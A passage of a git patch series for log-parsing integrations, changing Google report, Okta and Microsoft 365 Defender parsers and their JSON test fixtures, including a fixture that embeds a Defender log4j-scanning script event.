-    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}"
+    }
   },
   "expected": {
     "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}",

From 38fed737300edb69601eb0e28afb3a1fc1f6450d Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 25 Oct 2024 12:18:35 +0200
Subject: [PATCH 169/317] apply prettier

---
 Google Cloud/google-report/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index 363bfd6b5..bd5fd0d4e 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -257,4 +257,4 @@ stages:
                     {% set _ = types.append("change") %}
                 {%- endif -%}
             {% endfor %}
-            {{ types|unique|list }}
\ No newline at end of file
+            {{ types|unique|list }}

From 962bc3bf7ff72e0de17f46e5c9143caf83a91d1a Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 28 Oct 2024 09:50:22 +0100
Subject: [PATCH 170/317] fix(Okta): fix user.target

---
 Okta/okta-system-logs/ingest/parser.yml          |  2 +-
 .../tests/test_auth_via_idp.json                 | 16 +++++++++++-----
 .../tests/test_auth_via_mfa.json                 |  8 +++++++-
 .../tests/test_authentication_sso.json           |  8 +++++++-
 .../tests/test_authentication_sso_failure.json   |  8 +++++++-
 .../okta-system-logs/tests/test_send_factor.json |  8 +++++++-
 Okta/okta-system-logs/tests/test_target.json     | 10 ++++++++--
 .../tests/test_update_account.json               |  8 +++++++-
 8 files changed, 55 insertions(+), 13 deletions(-)

diff --git a/Okta/okta-system-logs/ingest/parser.yml b/Okta/okta-system-logs/ingest/parser.yml
index a764a139a..377fde09e 100644
--- a/Okta/okta-system-logs/ingest/parser.yml
+++ b/Okta/okta-system-logs/ingest/parser.yml
@@ -37,7 +37,7 @@ stages:
           user.full_name: "{{parsed_event.message.actor.displayName}}"
         filter: '{{parsed_event.message.get("actor") != None}}'
       - set:
-          user: >
+          user.target: >
             {% for target in parsed_event.message.target if target.get("type") in ["AppUser", "User"] %}
               {%- if loop.first %}{
               "id": "{{target.id}}",
diff --git a/Okta/okta-system-logs/tests/test_auth_via_idp.json b/Okta/okta-system-logs/tests/test_auth_via_idp.json
index 9df9dda5f..7852462a5 100644
--- a/Okta/okta-system-logs/tests/test_auth_via_idp.json
+++ b/Okta/okta-system-logs/tests/test_auth_via_idp.json
@@ -61,7 +61,7 @@
         "1.2.3.4"
       ],
       "user": [
-        "john.doe@example.org"
+        "system@okta.com"
       ]
     },
     "source": {
@@ -87,10 +87,16 @@
       "top_level_domain": "org"
     },
     "user": {
-      "email": "john.doe@example.org",
-      "full_name": "John Doe",
-      "id": "eWiaLPtSTpjyy1BIwNFXg",
-      "name": "john.doe@example.org"
+      "email": "system@okta.com",
+      "full_name": "Okta System",
+      "id": "2pHxMaUZr2yoej9R2Lsf4",
+      "name": "system@okta.com",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "eWiaLPtSTpjyy1BIwNFXg",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Okta/okta-system-logs/tests/test_auth_via_mfa.json b/Okta/okta-system-logs/tests/test_auth_via_mfa.json
index 58faae959..ac62db966 100644
--- a/Okta/okta-system-logs/tests/test_auth_via_mfa.json
+++ b/Okta/okta-system-logs/tests/test_auth_via_mfa.json
@@ -84,7 +84,13 @@
       "email": "john.doe@example.org",
       "full_name": "John Doe",
       "id": "eWiaLPtSTpjyy1BIwNFXg",
-      "name": "john.doe@example.org"
+      "name": "john.doe@example.org",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "eWiaLPtSTpjyy1BIwNFXg",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Okta/okta-system-logs/tests/test_authentication_sso.json b/Okta/okta-system-logs/tests/test_authentication_sso.json
index 8d7a62d91..2a7237808 100644
--- a/Okta/okta-system-logs/tests/test_authentication_sso.json
+++ b/Okta/okta-system-logs/tests/test_authentication_sso.json
@@ -83,7 +83,13 @@
       "email": "john.doe@example.org",
       "full_name": "John Doe",
       "id": "eWiaLPtSTpjyy1BIwNFXg",
-      "name": "john.doe@example.org"
+      "name": "john.doe@example.org",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "eWiaLPtSTpjyy1BIwNFXg",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Okta/okta-system-logs/tests/test_authentication_sso_failure.json b/Okta/okta-system-logs/tests/test_authentication_sso_failure.json
index 155c51867..0301b80ce 100644
--- a/Okta/okta-system-logs/tests/test_authentication_sso_failure.json
+++ b/Okta/okta-system-logs/tests/test_authentication_sso_failure.json
@@ -84,7 +84,13 @@
       "email": "john.doe@example.org",
       "full_name": "John Doe",
       "id": "fWiaLPtSTpjyy1BIwNFXg",
-      "name": "john.doe@example.org"
+      "name": "john.doe@example.org",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "fWiaLPtSTpjyy1BIwNFXg",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Okta/okta-system-logs/tests/test_send_factor.json b/Okta/okta-system-logs/tests/test_send_factor.json
index 0fcd1fc2a..458ff4d2d 100644
--- a/Okta/okta-system-logs/tests/test_send_factor.json
+++ b/Okta/okta-system-logs/tests/test_send_factor.json
@@ -78,7 +78,13 @@
       "email": "john.doe@example.org",
       "full_name": "John Doe",
       "id": "eWiaLPtSTpjyy1BIwNFXg",
-      "name": "john.doe@example.org"
+      "name": "john.doe@example.org",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "eWiaLPtSTpjyy1BIwNFXg",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Okta/okta-system-logs/tests/test_target.json b/Okta/okta-system-logs/tests/test_target.json
index eb94b5ec6..34f3e9184 100644
--- a/Okta/okta-system-logs/tests/test_target.json
+++ b/Okta/okta-system-logs/tests/test_target.json
@@ -84,8 +84,14 @@
     "user": {
       "email": "john.doe@example.org",
       "full_name": "John Doe",
-      "id": "0ua42fzx6ndP18frF697",
-      "name": "john.doe@example.org"
+      "id": "00u42g1huy7jGFsKX697",
+      "name": "john.doe@example.org",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "0ua42fzx6ndP18frF697",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {
diff --git a/Okta/okta-system-logs/tests/test_update_account.json b/Okta/okta-system-logs/tests/test_update_account.json
index 14412c4f3..7a50fde29 100644
--- a/Okta/okta-system-logs/tests/test_update_account.json
+++ b/Okta/okta-system-logs/tests/test_update_account.json
@@ -78,7 +78,13 @@
       "email": "john.doe@example.org",
       "full_name": "John Doe",
       "id": "eWiaLPtSTpjyy1BIwNFXg",
-      "name": "john.doe@example.org"
+      "name": "john.doe@example.org",
+      "target": {
+        "email": "john.doe@example.org",
+        "full_name": "John Doe",
+        "id": "eWiaLPtSTpjyy1BIwNFXg",
+        "name": "john.doe@example.org"
+      }
     },
     "user_agent": {
       "device": {

From c09b5530708171e9c4e634417e2360b442a2c5f3 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 29 Oct 2024 07:57:56 +0200
Subject: [PATCH 171/317] Add more smart descriptions

---
 .../_meta/smart-descriptions.json             | 21 +++++
 .../tests/test_deivce_events_2.json           | 52 ++++++++++++
 .../tests/test_device_process_events_2.json   | 82 +++++++++++++++++++
 .../test_devices_events_script_content.json   | 52 ++++++++++++
 4 files changed, 207 insertions(+)
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
 create mode 100644 Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json

diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
index b0c711ee5..21e3caf3c 100644
--- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
+++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json
@@ -424,5 +424,26 @@
       { "field": "user.name" },
       { "field": "user.full_name" }
     ]
+  },
+  {
+    "value": "Script with hash {file.hash.sha256} ran on {host.name}",
+    "conditions": [
+      { "field": "event.dataset", "value": "device_events" },
+      { "field": "action.type", "value": "ScriptContent" }
+    ]
+  },
+  {
+    "value": "{file.name} executed on {host.name}",
+    "conditions": [
+      { "field": "event.dataset", "value": "device_process_events" },
+      { "field": "action.type", "value": "ProcessCreated" }
+    ],
+    "relationships": [
+      {
+        "source": "file.name",
+        "target": "host.name",
+        "type": "was executed on"
+      }
+    ]
   }
 ]
diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
new file mode 100644
index 000000000..1f1351d52
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json
@@ -0,0 +1,52 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024  # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n    for i, item in enumerate(l):\\\\n        if i > n:\\\\n            break\\\\n        yield item\\\\n\\\\nclass Jar:\\\\n    def __init__(self, path):\\\\n        self.path = path\\\\n        self._manifest = {}\\\\n        self._dirlist = []\\\\n\\\\n    def _parse_manifest(self, lines):\\\\n        version_indication = \\\\\\\"version=\\\\\\\"\\\\n        version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n        if len(version_lines) > 0:\\\\n            version = version_lines[0][len(version_indication):]\\\\n            yield 'Version', version.strip()\\\\n\\\\n        field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n        for line in lines:\\\\n            if any(line.startswith(field_name) for field_name in field_names):\\\\n                    key, value = line.split(':')\\\\n                    yield key.strip(), value.strip()\\\\n\\\\n    def _open(self):\\\\n        if not zipfile.is_zipfile(self.path):\\\\n            raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n        return zipfile.ZipFile(self.path)\\\\n\\\\n    def _read_dirlist(self):\\\\n        with self._open() as zf:\\\\n            filenames = dict(p for p in zf.namelist())\\\\n            return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n    def _get_manifest_path(self, zf):\\\\n        for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n            if path in zf.namelist():\\\\n                return path\\\\n\\\\n    def _read_manifest(self, throw_on_error=False):\\\\n        try:\\\\n            with self._open() as zf:\\\\n                manifest_path = self._get_manifest_path(zf)\\\\n                if not manifest_path:\\\\n                    # Not found manifest file\\\\n                    return {}\\\\n\\\\n                manifest_info = zf.getinfo(manifest_path)\\\\n                if manifest_info.file_size > MAX_FILE_SIZE:\\\\n                    raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n                with zf.open(manifest_path) as f:\\\\n                    readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n                    manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n                    manifest = self._parse_manifest(manifest_lines)\\\\n                    return dict((k, v) for k, v in manifest\\\\n                            if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n        except:\\\\n            sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n            if throw_on_error:\\\\n                raise\\\\n\\\\n            return {}\\\\n\\\\n    def manifest(self, throw_on_error=False):\\\\n        if not self._manifest:\\\\n            self._manifest = self._read_manifest(throw_on_error)\\\\n        return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024  # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n    for i, item in enumerate(l):\\\\n        if i > n:\\\\n            break\\\\n        yield item\\\\n\\\\nclass Jar:\\\\n    def __init__(self, path):\\\\n        self.path = path\\\\n        self._manifest = {}\\\\n        self._dirlist = []\\\\n\\\\n    def _parse_manifest(self, lines):\\\\n        version_indication = \\\\\\\"version=\\\\\\\"\\\\n        version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n        if len(version_lines) > 0:\\\\n            version = version_lines[0][len(version_indication):]\\\\n            yield 'Version', version.strip()\\\\n\\\\n        field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n        for line in lines:\\\\n            if any(line.startswith(field_name) for field_name in field_names):\\\\n                    key, value = line.split(':')\\\\n                    yield key.strip(), value.strip()\\\\n\\\\n    def _open(self):\\\\n        if not zipfile.is_zipfile(self.path):\\\\n            raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n        return zipfile.ZipFile(self.path)\\\\n\\\\n    def _read_dirlist(self):\\\\n        with self._open() as zf:\\\\n            filenames = dict(p for p in zf.namelist())\\\\n            return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n    def _get_manifest_path(self, zf):\\\\n        for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n            if path in zf.namelist():\\\\n                return path\\\\n\\\\n    def _read_manifest(self, throw_on_error=False):\\\\n        try:\\\\n            with self._open() as zf:\\\\n                manifest_path = self._get_manifest_path(zf)\\\\n                if not manifest_path:\\\\n                    # Not found manifest file\\\\n                    return {}\\\\n\\\\n                manifest_info = zf.getinfo(manifest_path)\\\\n                if manifest_info.file_size > MAX_FILE_SIZE:\\\\n                    raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n                with zf.open(manifest_path) as f:\\\\n                    readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n                    manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n                    manifest = self._parse_manifest(manifest_lines)\\\\n                    return dict((k, v) for k, v in manifest\\\\n                            if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n        except:\\\\n            sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n            if throw_on_error:\\\\n                raise\\\\n\\\\n            return {}\\\\n\\\\n    def manifest(self, throw_on_error=False):\\\\n        if not self._manifest:\\\\n            self._manifest = self._read_manifest(throw_on_error)\\\\n        return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "device_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-22T15:09:08.851712Z",
+    "action": {
+      "properties": {
+        "InitiatingProcessLogonId": "0"
+      },
+      "type": "ScriptContent"
+    },
+    "file": {
+      "hash": {
+        "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+      }
+    },
+    "host": {
+      "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca",
+      "name": "computer.intranet.example"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "65306"
+        }
+      }
+    },
+    "process": {
+      "parent": {
+        "pid": 0
+      },
+      "pid": 417271,
+      "start": "2024-10-22T15:09:08.624070Z"
+    },
+    "related": {
+      "hash": [
+        "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
new file mode 100644
index 000000000..808ffdbdb
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json
@@ -0,0 +1,82 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\